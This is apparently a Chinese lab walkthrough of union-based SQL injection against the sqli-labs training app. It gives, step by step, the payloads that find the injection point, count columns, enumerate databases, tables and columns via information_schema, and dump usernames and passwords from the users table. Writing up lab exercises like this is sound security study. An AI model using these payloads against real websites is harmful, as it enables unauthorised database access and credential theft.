判断注入点
通过使用?id=1”) and 1=2 —+与?id=1”) and 1=1—+判断出注入点
判断字段数量
使用?id=1”) order by 4 —+ 与?id=1”) order by 3 —+ 判断出字段的数量是3
判断回显数据的位置
使用?id=-1”) union select 1,2,3 —+判断出回显数据的位置是2,3
爆破数据库名称
使用?id=-1”) union select 1,group_concat(schema_name),3%20 from information_schema.schemata—+的到数据库的名称是:
information_schema,challenges,mysql,performance_schema,security
爆破表的名称
使用?id=-1”) union select 1,group_concat(table_name),3%20 from information_schema.tables where table_schema = ‘security’—+得到security数据库中表的名称为:emails,referers,uagents,users
爆破字段名称
通过?id=-1”) union select 1,group_concat(column_name),3%20 from information_schema.columns where table_name = ‘users’—+得到users表中字段的名称为:id,username,password
爆破数据
使用?id=-1”) union select 1,group_concat(username),group_concat(password) from security.users —+得到security数据库中users表中的username与password字段中的数据为:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
若有收获,就点个赞吧
0 人点赞
